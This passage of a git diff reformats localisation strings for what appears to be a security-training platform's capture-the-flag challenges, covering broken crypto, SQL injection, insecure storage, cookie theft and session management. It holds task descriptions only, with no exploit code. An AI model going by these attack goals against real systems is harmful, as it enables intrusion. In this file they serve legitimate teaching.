-insecureCryptoStorage.4.shop.couponCode=Coupon Code:
-insecureCryptoStorage.4.shop.submit=Place Order
-insecureCryptoStorage.loading=Loading...
-insecureCryptoStorage.errorOccurred=An Error Occurred
-insecureCryptoStorage.decrypt=Decrypt
+insecureCryptoStorage.1.challengename = Insecure Cryptographic Storage Challenge 1
+insecureCryptoStorage.2.challengename = Insecure Cryptographic Storage Challenge 2
+insecureCryptoStorage.3.challengename = Insecure Cryptographic Storage Challenge 3
+insecureCryptoStorage.4.challengename = Insecure Crypto Storage Challenge 4
+
+insecureCryptoStorage.1.whatToDo = The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. However, the result key has been encrypted with a famous, but easily broken, Roman cipher. The Plain text is in English.
+
+insecureCryptoStorage.2.whatToDo = The result key has been encrypted to ensure that nobody can finish the challenge without knowing the secret key to decrypt it. The following form can be used to check if you have the correct result key.
+insecureCryptoStorage.2.checkKey = Check Result Key
+insecureCryptoStorage.2.hint = 2D Encryption
+insecureCryptoStorage.2.commentedCode.1 = Validate theKey:
+insecureCryptoStorage.2.commentedCode.2 = Transform input:
+insecureCryptoStorage.2.commentedCode.3 = Check result for validity
+insecureCryptoStorage.2.commentedCode.4 = Output the "output" variable to the HTML for viewing
+
+insecureCryptoStorage.3.whatToDo = The result key to this level is the same as the encryption key used in the following sub application. Break the cipher and recover the encryption key! The result key is in all capital letters and is in English.
+insecureCryptoStorage.3.ciphertextToDecrypt = Cipher text to decrypt:
+insecureCryptoStorage.3.ciphertextExample = Cipher text Example
+insecureCryptoStorage.3.tryDecryptThis = Try to decrypt this:
+
+insecureCryptoStorage.4.whatToDo = If you can buy oranges for free you'll receive the key for this level!
+insecureCryptoStorage.4.shop = Super Fruit Shopping
+insecureCryptoStorage.4.shop.message.1 = Hey customers: Due to a shipping mistake we are completely over stocked fruit. Use the coupon code
+insecureCryptoStorage.4.shop.message.2 = or
+insecureCryptoStorage.4.shop.message.3 = to get yours for free!!!
+insecureCryptoStorage.4.shop.picture = Picture
+insecureCryptoStorage.4.shop.cost = Cost
+insecureCryptoStorage.4.shop.quantity = Quantity
+insecureCryptoStorage.4.shop.howToShop = Please select how many things you would like to buy and click submit
+insecureCryptoStorage.4.shop.couponCode = Coupon Code:
+insecureCryptoStorage.4.shop.submit = Place Order
+
+insecureCryptoStorage.loading = Loading...
+insecureCryptoStorage.errorOccurred = An Error Occurred
+insecureCryptoStorage.decrypt = Decrypt
 
diff --git a/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties b/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
index 20eba709a..0187da821 100644
--- a/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
+++ b/src/main/resources/i18n/challenges/mobile/brokenCrypto/brokenCrypto.properties
@@ -1,6 +1,10 @@
-challenge1.challengeName=Mobile Broken Crypto 1
-challenge1.para1=This App uses a deprecated encryption algorithm (DES) and breaks a vital rule of key management. The key is in the conversation. Decrypt the chat to get the key.  			
-challenge2.challengeName=Mobile Broken Crypto 2
-challenge2.para1=This App uses DES to encrypt it's chat however it's developers have implemented this poorly. The key is in the conversation. Decrypt the chat to get the key.  			
-challenge3.challengeName=Mobile Broken Crypto 3
-challenge3.para1=The key for this challenge can be found in the client side database. Get the key to pass this challenge.  			
+challenge1.challengeName = Mobile Broken Crypto 1
+challenge1.para1 = This App uses a deprecated encryption algorithm (DES) and breaks a vital rule of key management. The key is in the conversation. Decrypt the chat to get the key.  			
+
+
+challenge2.challengeName = Mobile Broken Crypto 2
+challenge2.para1 = This App uses DES to encrypt it's chat however it's developers have implemented this poorly. The key is in the conversation. Decrypt the chat to get the key.  			
+
+
+challenge3.challengeName = Mobile Broken Crypto 3
+challenge3.para1 = The key for this challenge can be found in the client side database. Get the key to pass this challenge.  			
diff --git a/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties b/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
index 905a21a69..ec9333ec6 100644
--- a/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
+++ b/src/main/resources/i18n/challenges/mobile/clientSideInjection/clientSideInjection.properties
@@ -1,5 +1,8 @@
-challenge1.challengeName=Mobile Client Side Injection 1
-challenge1.para1=The App for this challenge uses sloppy filters in an attempt to thwart attackers. These filters can be easily bypassed. Login to get the key. 
+challenge1.challengeName = Mobile Client Side Injection 1
+challenge1.para1 = The App for this challenge uses sloppy filters in an attempt to thwart attackers. These filters can be easily bypassed. Login to get the key. 
+
+
 //TODO
-challenge2.challengeName=Mobile Client Side Injection 2
-challenge2.para1=This App has an upgraded form of filtering. Bypass the filtering, and perform SQL Injection to sign in as a legitimate user. 
+
+challenge2.challengeName = Mobile Client Side Injection 2
+challenge2.para1 = This App has an upgraded form of filtering. Bypass the filtering, and perform SQL Injection to sign in as a legitimate user. 
diff --git a/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties b/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
index b1593e76e..d6e8dd35f 100644
--- a/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
+++ b/src/main/resources/i18n/challenges/mobile/insecureData/insecureDataStrings.properties
@@ -1,6 +1,9 @@
-challenge1.challengeName=Mobile Insecure Data Storage 1
-challenge1.para1=The App for this challenge stores user credentials within a database, the data has not been stored in plain text but it also has not been encrypted. Make the credentials readable to get the key. The key is the Admin's password.
-challenge2.challengeName=Mobile Insecure Data Storage 2
-challenge2.para1=The App for this challenge, <a>InsecureData2</a> uses a hashing algorithm on stored user credentials. However, there are two issues here, firstly the user is using a <a>bad password</a>. Secondly, the App does <a>not use a salt</a> when hashing the data. The result key to this challenge is the user's password.
-challenge3.challengeName=Mobile Insecure Data Storage 3
-challenge3.para1=Not all Apps will use <a>sqlite</a> to store user data, in some cases <a>SharedPreferences</a> is used. The key to this level can be gained once you log in as a legitimate user. 
+challenge1.challengeName = Mobile Insecure Data Storage 1
+challenge1.para1 = 	The App for this challenge stores user credentials within a database, the data has not been stored in plain text but it also has not been encrypted. Make the credentials readable to get the key. The key is the Admin's password.
+
+challenge2.challengeName = Mobile Insecure Data Storage 2
+challenge2.para1 = 	The App for this challenge, <a>InsecureData2</a> uses a hashing algorithm on stored user credentials. However, there are two issues here, firstly the user is using a <a>bad password</a>. Secondly, the App does <a>not use a salt</a> when hashing the data. The result key to this challenge is the user's password.
+
+
+challenge3.challengeName = Mobile Insecure Data Storage 3
+challenge3.para1 = 	Not all Apps will use <a>sqlite</a> to store user data, in some cases <a>SharedPreferences</a> is used. The key to this level can be gained once you log in as a legitimate user. 
diff --git a/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties b/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
index e57c67201..df8582827 100644
--- a/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
+++ b/src/main/resources/i18n/challenges/mobile/poorAuthentication/poorAuthentication.properties
@@ -1,2 +1,2 @@
-challenge1.challengeName=Poor Authentication 1
-challenge1.para1=You must log into the App  <a>PoorAuthentication1.apk</a> to get the key. The Username and Password have been saved but this App uses a specially generated <a>Authentication Code</a>. 
+challenge1.challengeName = Poor Authentication 1
+challenge1.para1 = 	You must log into the App  <a>PoorAuthentication1.apk</a> to get the key. The Username and Password have been saved but this App uses a specially generated <a>Authentication Code</a>. 
diff --git a/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties b/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
index fef451d1b..ed16354dd 100644
--- a/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
+++ b/src/main/resources/i18n/challenges/mobile/reverseEngineer/reverseEngineer.properties
@@ -1,6 +1,8 @@
-challenge1.challengeName=Mobile Reverse Engineer 1
-challenge1.para1=This key to this challenge is the App author's name. Find it to complete the challenge.
-challenge2.challengeName=Mobile Reverse Engineer 2
-challenge2.para1=When an attacker reverse engineers an APK, they usually find multiple <a>packages</a> containing multiple <a>activities</a>, containing multiple <a>methods</a> which have all been obfuscated to crawl through. The key for this challenge has been hard coded into the APK for this challenge. To get to the key reverse engineer the APK and find the correct Activity which performs a conditional statement to check the validity of the key.
-challenge3.challengeName=Mobile Reverse Engineer 3
-challenge3.para1=The developers of this App, <a>ReverseEngineer3</a>, have decided to use an algorithm to confirm or deny the authenticity of the key. You must Reverse Engineer ReverseEngineer3.APK to find this algorithm. If you are unsure whether or not the key is correct, there is a key validity checker in the App. 
\ No newline at end of file
+challenge1.challengeName = Mobile Reverse Engineer 1
+challenge1.para1 = This key to this challenge is the App author's name. Find it to complete the challenge.
+
+challenge2.challengeName = Mobile Reverse Engineer 2
+challenge2.para1 = When an attacker reverse engineers an APK, they usually find multiple <a>packages</a> containing multiple <a>activities</a>, containing multiple <a>methods</a> which have all been obfuscated to crawl through. The key for this challenge has been hard coded into the APK for this challenge. To get to the key reverse engineer the APK and find the correct Activity which performs a conditional statement to check the validity of the key.
+
+challenge3.challengeName = Mobile Reverse Engineer 3
+challenge3.para1 = The developers of this App, <a>ReverseEngineer3</a>, have decided to use an algorithm to confirm or deny the authenticity of the key. You must Reverse Engineer ReverseEngineer3.APK to find this algorithm. If you are unsure whether or not the key is correct, there is a key validity checker in the App. 
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties b/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
index 5a6eee12d..7e3ca6982 100644
--- a/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
+++ b/src/main/resources/i18n/challenges/mobile/unintendedDataLeakage/dataLeakage.properties
@@ -1,4 +1,5 @@
-challenge1.challengeName=Unintended Data Leakage 1
-challenge1.para1=Log in as the user of this App to get the key for this challenge. <a>Some data</a> has been logged but it is up to the attacker to know what to do with this data.
-challenge2.challengeName=Unintended Data Leakage 2
-challenge2.para1=This App is leaking logs. The Key is the winning lotto number!
\ No newline at end of file
+challenge1.challengeName = Unintended Data Leakage 1
+challenge1.para1 = Log in as the user of this App to get the key for this challenge. <a>Some data</a> has been logged but it is up to the attacker to know what to do with this data.
+
+challenge2.challengeName = Unintended Data Leakage 2
+challenge2.para1 = This App is leaking logs. The Key is the winning lotto number!
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties b/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
index a302f8ebf..89aea5c7b 100644
--- a/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
+++ b/src/main/resources/i18n/challenges/poorValidation/poorValidationStrings.properties
@@ -1,12 +1,14 @@
-poorValidation.1.challengeName=Poor Validation One
-poorValidation.2.challengeName=Poor Validation Two
-poorValidation.whatToDo=If you can buy oranges for free you'll receive the key for this level!
-poorValidation.shopping=Super Fruit Shopping
-poorValidation.shopping.whatToDo=Use this shop to buy whatever fruit you like!
-poorValidation.howToShop=Please select how many items you would like to buy and click submit
-poorValidation.picture=Picture
-poorValidation.cost=Cost
-poorValidation.quantity=Quantity
-poorValidation.placeOrder=Place Order
-poorValidation.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+poorValidation.1.challengeName = Poor Validation One
+poorValidation.2.challengeName = Poor Validation Two
+
+poorValidation.whatToDo = If you can buy oranges for free you'll receive the key for this level!
+poorValidation.shopping = Super Fruit Shopping
+poorValidation.shopping.whatToDo = Use this shop to buy whatever fruit you like!
+poorValidation.howToShop = Please select how many items you would like to buy and click submit
+poorValidation.picture = Picture
+poorValidation.cost = Cost
+poorValidation.quantity = Quantity
+poorValidation.placeOrder = Place Order
+poorValidation.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties b/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
index 581d6d7c1..9e43ecbb1 100644
--- a/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
+++ b/src/main/resources/i18n/challenges/securityMisconfig/c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4.properties
@@ -1,8 +1,10 @@
-securityMisconfig.stealTokens.challengeName=Security Misconfiguration Cookie Flag Challenge
-securityMisconfig.stealTokens.description=To complete this challenge, you must steal the <a>securityMisconfigLesson</a> cookie of another user. The administrators of the sub application have misconfigured the mechanism which enforces cookie security flags. The cookie set in this lesson has not been given the "secure" flag. This means that in any HTTP requests to the lesson will include this cookie. Even though the application (If Shepherd has been correctly configured) redirects to a HTTPs service upon access, the will have been sent across the network in plain text. When players open this lesson, they automatically send a HTTP request thanks to the following &lt;IMG&gt; element. Image elements do not follow the mixed content policy and will send HTTP requests even when loaded inside a HTTPs context. This will not work with an iFrame.
-securityMisconfig.stealTokens.whyThisImageIsHere=This Image has sent your securityMisconfigLesson across the network in plain text
-securityMisconfig.stealTokens.haveSomebodyOnYourNetwork=If there are no users on your local network, this lesson is <B>very difficult</B> to complete. Please ask your Shepherd Administrator to disable it.
-securityMisconfig.stealTokens.stealTokenThenDoThis=Once you have stolen another user's <a>securityMisconfigLesson</a> token, click the following button and sub in the other user's token where your own exists.
-form.securityMisconfig.stealTokens.submit=Get Result Key
-form.challenge.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+securityMisconfig.stealTokens.challengeName = Security Misconfiguration Cookie Flag Challenge
+securityMisconfig.stealTokens.description = To complete this challenge, you must steal the <a>securityMisconfigLesson</a> cookie of another user. The administrators of the sub application have misconfigured the mechanism which enforces cookie security flags. The cookie set in this lesson has not been given the "secure" flag. This means that in any HTTP requests to the lesson will include this cookie. Even though the application (If Shepherd has been correctly configured) redirects to a HTTPs service upon access, the will have been sent across the network in plain text. When players open this lesson, they automatically send a HTTP request thanks to the following &lt;IMG&gt; element. Image elements do not follow the mixed content policy and will send HTTP requests even when loaded inside a HTTPs context. This will not work with an iFrame.
+securityMisconfig.stealTokens.whyThisImageIsHere = This Image has sent your securityMisconfigLesson across the network in plain text
+securityMisconfig.stealTokens.haveSomebodyOnYourNetwork = If there are no users on your local network, this lesson is <B>very difficult</B> to complete. Please ask your Shepherd Administrator to disable it.
+securityMisconfig.stealTokens.stealTokenThenDoThis = Once you have stolen another user's <a>securityMisconfigLesson</a> token, click the following button and sub in the other user's token where your own exists.
+
+form.securityMisconfig.stealTokens.submit = Get Result Key
+form.challenge.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties b/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
index 2a46bfbe2..686a641d4 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80.properties
@@ -1,13 +1,16 @@
-challenge.challengeName=Session Management Challenge Seven
-challenge.description=To complete this challenge you must sign in as one of the users with an privileged user role.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-question.header=Log In with via Security Question
-question.whatToDo=Please enter your <a>email address</a> to retrieve your Security Question;
-question.form.getQuestion=Get Security Question
-question.form.giveAnswer=Submit Answer
-clue.1=Answer Controller
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Seven
+challenge.description = To complete this challenge you must sign in as one of the users with an privileged user role.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+question.header = Log In with via Security Question
+question.whatToDo = Please enter your <a>email address</a> to retrieve your Security Question;
+question.form.getQuestion = Get Security Question
+question.form.giveAnswer = Submit Answer
+
+clue.1 = Answer Controller
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties b/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
index 7a0c7c9f5..c68b1a0b7 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334.properties
@@ -1,8 +1,9 @@
-challenge.challengeName=Session Management Challenge Eight
-challenge.description=Only highly privileged
-challenge.description.2=users of the following sub-application can retrieve the result key.
-challenge.comment=Sorry Player, No Hints on the specific name of the privileged role in this challenge
-challenge.privilegedButton=Privileged User Only Button
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Eight
+challenge.description = Only highly privileged
+challenge.description.2 = users of the following sub-application can retrieve the result key.
+challenge.comment = Sorry Player, No Hints on the specific name of the privileged role in this challenge
+challenge.privilegedButton = Privileged User Only Button
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties b/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
index a45f49a26..89fb928de 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1.properties
@@ -1,14 +1,17 @@
-challenge.challengeName=Session Management Challenge Five
-challenge.description=Only an account with <a>admin</a> privileges in the following sub-application can retrieve the result key to this challenge.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Forgotten Password?
-challenge.form.loading=Loading...
-change.header=Get Change Password Email
-change.whatToDo=Please enter your user name to have your password reset link for this sub application send to your email address. Please click the link in the email quickly as tokens automatically expire after a few minutes
-change.form.sendEmail=Send Email
-clue.1=Reset Password Form
-clue.2=Change Password Form (Requires Valid Token)
-clue.3=Token life is 10 mins
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Five
+challenge.description = Only an account with <a>admin</a> privileges in the following sub-application can retrieve the result key to this challenge.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Forgotten Password?
+challenge.form.loading = Loading...
+
+change.header = Get Change Password Email
+change.whatToDo = Please enter your user name to have your password reset link for this sub application send to your email address. Please click the link in the email quickly as tokens automatically expire after a few minutes
+change.form.sendEmail = Send Email
+
+clue.1 = Reset Password Form
+clue.2 = Change Password Form (Requires Valid Token)
+clue.3 = Token life is 10 mins
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties b/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
index d7d4d9782..c13631676 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece.properties
@@ -1,13 +1,16 @@
-challenge.challengeName=Session Management Challenge Six
-challenge.description=To complete this challenge you must sign in as one of the users with an privileged user role.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPassword=Have you forgotten your password?
-challenge.form.loading=Loading...
-question.header=Log In with via Security Question
-question.whatToDo=Please enter your <a>email address</a> to retrieve your Security Question;
-question.form.getQuestion=Get Security Question
-question.form.giveAnswer=Submit Answer
-clue.1=Answer Controller
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Six
+challenge.description = To complete this challenge you must sign in as one of the users with an privileged user role.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPassword = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+question.header = Log In with via Security Question
+question.whatToDo = Please enter your <a>email address</a> to retrieve your Security Question;
+question.form.getQuestion = Get Security Question
+question.form.giveAnswer = Submit Answer
+
+clue.1 = Answer Controller
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties b/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
index 6f7c20ee1..5addcf172 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/d779e34a54172cbc245300d3bc22937090ebd3769466a501a5e7ac605b9f34b7.properties
@@ -1,11 +1,13 @@
-challenge.challengeName=Session Management Challenge Two
-challenge.description=Only an <a>admin</a> of the following sub-application can retrieve the result key to this challenge.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.forgotPass=Have you forgotten your password?
-challenge.form.loading=Loading...
-reset.header=Reset Password
-reset.whatToDo=Please enter your <a>email address</a>. You will be sent an email with a new temporary password
-reset.requestSent=Password reset request sent.
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Two
+challenge.description = Only an <a>admin</a> of the following sub-application can retrieve the result key to this challenge.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.forgotPass = Have you forgotten your password?
+challenge.form.loading = Loading...
+
+reset.header = Reset Password
+reset.whatToDo = Please enter your <a>email address</a>. You will be sent an email with a new temporary password
+reset.requestSent = Password reset request sent.
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties b/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
index 7004d24ed..fd3831b1a 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/dfd6bfba1033fa380e378299b6a998c759646bd8aea02511482b8ce5d707f93a.properties
@@ -1,5 +1,6 @@
-challenge.challengeName=Session Management Challenge One
-challenge.description=Only administrators of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Administrator Only Button
-challenge.form.loading=Loading...
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge One
+challenge.description = Only administrators of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Administrator Only Button
+challenge.form.loading = Loading...
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties b/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
index ff44c8a56..66f39157f 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/ec43ae137b8bf7abb9c85a87cf95c23f7fadcf08a092e05620c9968bd60fcba6.properties
@@ -1,6 +1,7 @@
-challenge.challengeName=Session Management Challenge Four
-challenge.description=Only an admin of the following sub-application can retrieve the result key.
-challenge.form.adminButton=Admin Only Button
-challenge.form.loading=Loading...
-challenge.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Four
+challenge.description = Only an admin of the following sub-application can retrieve the result key.
+challenge.form.adminButton = Admin Only Button
+challenge.form.loading = Loading...
+challenge.hint = Would you like a hint?
+
+error.occurred = An Error Occurred
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties b/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
index 66f16c881..e955d2655 100644
--- a/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
+++ b/src/main/resources/i18n/challenges/sessionManagement/t193c6634f049bcf65cdcac72269eeac25dbb2a6887bdb38873e57d0ef447bc3.properties
@@ -1,16 +1,18 @@
-challenge.challengeName=Session Management Challenge Three
-challenge.description=Only an <a>admin</a> of the following sub-application can retrieve the result key to this challenge. You have been granted user privileges because the admins need somebody to boss around.
-challenge.form.userName=User Name:
-challenge.form.password=Password:
-challenge.form.signIn=Sign In
-challenge.form.userFunctions=Toggle user functions
-challenge.form.loading=Loading...
-reset.header=Change Password
-reset.whatToDo=Please enter your new password for this sub application!
-reset.form.new=New Password:
-reset.form.confirm=Confirm Password:
-reset.form.changePass=Change Password
-reset.requestSent=Password reset request sent.
-error.occurred=An Error Occurred
-error.tooShort=Password is too short!
-error.noMatch=Passwords don't match!
\ No newline at end of file
+challenge.challengeName = Session Management Challenge Three
+challenge.description = Only an <a>admin</a> of the following sub-application can retrieve the result key to this challenge. You have been granted user privileges because the admins need somebody to boss around.
+challenge.form.userName = User Name:
+challenge.form.password = Password:
+challenge.form.signIn = Sign In
+challenge.form.userFunctions = Toggle user functions
+challenge.form.loading = Loading...
+
+reset.header = Change Password
+reset.whatToDo = Please enter your new password for this sub application!
+reset.form.new = New Password:
+reset.form.confirm = Confirm Password:
+reset.form.changePass = Change Password
+reset.requestSent = Password reset request sent.
+
+error.occurred = An Error Occurred
+error.tooShort = Password is too short!
+error.noMatch = Passwords don't match!
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties b/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
index 926d2c0c5..a9784743c 100644
--- a/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/278fa30ee727b74b9a2522a5ca3bf993087de5a0ac72adff216002abf79146fa.properties
@@ -1,5 +1,6 @@
-challenge.challengeName=Failure to Restrict URL Access Challenge 2
-challenge.description=An administrator of the following sub application would have no issue finding the result key to this level. But considering that you are a mere guest, you will not be shown the simple button administrators can click.
-challenge.form.getInfo=Get Guest Info
-sign.loading=Loading
-sign.hint=Would you like a hint?
\ No newline at end of file
+challenge.challengeName = Failure to Restrict URL Access Challenge 2
+challenge.description = An administrator of the following sub application would have no issue finding the result key to this level. But considering that you are a mere guest, you will not be shown the simple button administrators can click.
+challenge.form.getInfo = Get Guest Info
+
+sign.loading = Loading
+sign.hint = Would you like a hint?
\ No newline at end of file
diff --git a/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties b/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
index 7082d72c7..d059fd5c4 100644
--- a/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
+++ b/src/main/resources/i18n/challenges/urlAccess/4a1bc73dd68f64107db3bbc7ee74e3f1336d350c4e1e51d4eda5b52dddf86c99.properties
@@ -1,8 +1,9 @@
-challenge.challengeName=Failure To Restrict URL Access Challenge 1
-challenge.description=To recover the result key for this challenge you need to obtain the current server status message from an administrator's point of view!
-challenge.form.instruction=Use this form to view the status of the server
-challenge.form.instruction.comment=from the point of view of a peasant or guest
-challenge.form.getStatus=Get Server Status
-sign.loading=Loading
-sign.hint=Would you like a hint?
-error.occurred=An Error Occurred
\ No newline at end of file
+challenge.challengeName = Failure To Restrict URL Access Challenge 1
+challenge.description = To recover the result key for this challenge you need to obtain the current server status message from an administrator's point of view!
+challenge.form.instruction = Use this form to view the status of the server
